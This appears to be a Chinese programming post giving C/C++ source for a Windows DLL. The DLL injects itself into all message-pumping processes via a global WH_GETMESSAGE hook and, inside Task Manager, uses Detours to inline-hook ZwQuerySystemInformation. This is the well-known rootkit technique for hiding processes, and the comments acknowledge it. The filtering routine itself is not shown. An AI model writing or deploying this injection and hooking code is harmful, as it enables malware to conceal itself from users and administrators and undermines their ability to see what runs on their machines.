还是和以前一样 Hook ZwQuerySystemInformation。用微软的Detour库,32位/64位都搞定。（说明：下面的 DLL 先通过全局 WH_GETMESSAGE 钩子被加载到各个进程里，只有当宿主进程名匹配 TASKMGR.EXE 时才在 DllMain 里安装 Detours 内联钩子，其余进程中只是空载。）
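// Install the inline hook on ntdll!ZwQuerySystemInformation.
//
// Resolves the export through DetourFindFunction, stores the original address
// in Real_ZwQuerySystemInformation, then redirects it to
// Mine_ZwQuerySystemInformation inside a Detours transaction.
//
// Returns NO_ERROR on success, ERROR_PROC_NOT_FOUND when the export cannot be
// resolved, or the error code of the Detours step that failed. On failure the
// transaction is aborted so no half-applied patch is left in ntdll.
//
// NOTE(review): pZwQuerySystemInformation, Real_ZwQuerySystemInformation and
// Mine_ZwQuerySystemInformation are declared elsewhere in this file.
LONG AttachDetours(VOID)
{
    // Resolve the original entry point first; NULL means the export is
    // missing and there is nothing to patch (the original code went ahead
    // and let DetourAttach fail on a NULL target).
    Real_ZwQuerySystemInformation = (pZwQuerySystemInformation)DetourFindFunction("ntdll.dll", "ZwQuerySystemInformation");
    if (Real_ZwQuerySystemInformation == NULL) {
        return ERROR_PROC_NOT_FOUND;
    }

    LONG err = DetourTransactionBegin();
    if (err != NO_ERROR) {
        return err;
    }
    // Enlist the calling thread in the transaction (Detours API contract).
    DetourUpdateThread(GetCurrentThread());
    err = DetourAttach(&(PVOID&)Real_ZwQuerySystemInformation, (PBYTE)Mine_ZwQuerySystemInformation);
    if (err != NO_ERROR) {
        // Roll back the pending transaction rather than committing a
        // transaction whose only operation already failed.
        DetourTransactionAbort();
        return err;
    }
    // Commit applies the patch; its return code is the caller's result.
    return DetourTransactionCommit();
}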
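// Remove the inline hook installed by AttachDetours and restore
// ntdll!ZwQuerySystemInformation.
//
// Returns NO_ERROR on success, ERROR_INVALID_PARAMETER when no hook was ever
// resolved (Real_ZwQuerySystemInformation is NULL), or the error code of the
// Detours step that failed. On failure the transaction is aborted.
LONG DetachDetours(VOID)
{
    // Nothing to unhook if AttachDetours never resolved the target; the
    // original code passed a NULL target straight into DetourDetach.
    if (Real_ZwQuerySystemInformation == NULL) {
        return ERROR_INVALID_PARAMETER;
    }

    LONG err = DetourTransactionBegin();
    if (err != NO_ERROR) {
        return err;
    }
    // Enlist the calling thread in the transaction (Detours API contract).
    DetourUpdateThread(GetCurrentThread());
    err = DetourDetach(&(PVOID&)Real_ZwQuerySystemInformation, (PBYTE)Mine_ZwQuerySystemInformation);
    if (err != NO_ERROR) {
        // Leave the hook in place rather than committing a failed detach.
        DetourTransactionAbort();
        return err;
    }
    return DetourTransactionCommit();
}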
//////////////////////////////////////////////////////////////////////////
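// DLL entry point.
//
// Because Hook() below installs a system-wide WH_GETMESSAGE hook, this DLL is
// mapped into every process that pumps messages and DllMain runs in each of
// them. The Detours hook is armed only when the host process name (szName,
// filled in elsewhere in this file) is TASKMGR.EXE; in every other process
// attach/detach are no-ops.
//
// Security note: patching ZwQuerySystemInformation inside Task Manager is the
// well-known user-mode technique for filtering what the process list shows
// (Mine_ZwQuerySystemInformation is not visible here, so the exact filtering
// is presumed, not shown). Anything that ships this should expect it to be
// detected as such.
//
// Returns TRUE unconditionally; the loader never refuses this DLL.
BOOL APIENTRY DllMain(HANDLE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
                      )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Win32 module names are case-insensitive ("Taskmgr.exe" and
        // "TASKMGR.EXE" name the same file). The original exact compare
        // silently missed any non-uppercase spelling unless szName is
        // normalised where it is produced (not visible here), so compare
        // ignoring case.
        if (0 == _tcsicmp(szName, _T("TASKMGR.EXE"))) {
            _Track(_T("inlineHook This Process %s"), szName);
            // Inline hook via Detours.
            DetourRestoreAfterWith();
            // Record the hook as installed only when it actually went in;
            // the original set bHooked = TRUE regardless and then tried to
            // detach a hook that did not exist on PROCESS_DETACH.
            bHooked = (AttachDetours() == NO_ERROR);
        }
    }
    break;
    case DLL_THREAD_ATTACH:
    break;
    case DLL_THREAD_DETACH:
    break;
    case DLL_PROCESS_DETACH:
    {
        // lpReserved != NULL on PROCESS_DETACH means the process itself is
        // terminating (not a FreeLibrary unload): other threads are already
        // gone and the patched ntdll image dies with the process, so only
        // unhook on an orderly unload.
        if (bHooked && lpReserved == NULL)
        {
            DetachDetours();
            bHooked = FALSE;
        }
    }
    break;
    default:
    break;
    }
    return TRUE;
}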
// WH_GETMESSAGE hook procedure.
//
// Deliberately does nothing with the message. The hook installed by Hook()
// exists only so that Windows maps this DLL into the hooked processes, at
// which point DllMain does the real work. Every call is forwarded unchanged to
// the next hook in the chain and its result returned.
LRESULT WINAPI MsgHookProc(int code, WPARAM wParam, LPARAM lParam)
{
    LRESULT chainResult = CallNextHookEx(NULL, code, wParam, lParam);
    return chainResult;
}
// Install the system-wide WH_GETMESSAGE hook that carries this DLL into other
// processes.
//
// dwThreadId is 0, i.e. the hook is not tied to one thread, so the module
// hInstDLL (set elsewhere in this file) gets loaded into every process that
// dispatches a window message. This is a DLL-injection vector by design and is
// the kind of global hook security tooling commonly flags. Per the
// SetWindowsHookEx contract a DLL is only injected into processes of its own
// bitness, which is presumably why the text above mentions 32- and 64-bit
// builds.
//
// Returns TRUE when the hook handle (kept in hHookMsg for Unhook()) was
// obtained, FALSE otherwise.
BOOL Hook()
{
    HHOOK installed = SetWindowsHookEx(WH_GETMESSAGE, MsgHookProc, hInstDLL, 0);
    hHookMsg = installed;
    return installed != NULL;
}
// Remove the WH_GETMESSAGE hook installed by Hook().
//
// Clears hHookMsg in every case and returns whatever UnhookWindowsHookEx
// reported for the handle that was stored. Note that a second call therefore
// hands NULL to the API, which is expected to fail and return FALSE, exactly
// as the stored-handle-then-clear ordering of the original did.
BOOL Unhook()
{
    HHOOK previous = hHookMsg;
    hHookMsg = NULL;
    return UnhookWindowsHookEx(previous);
}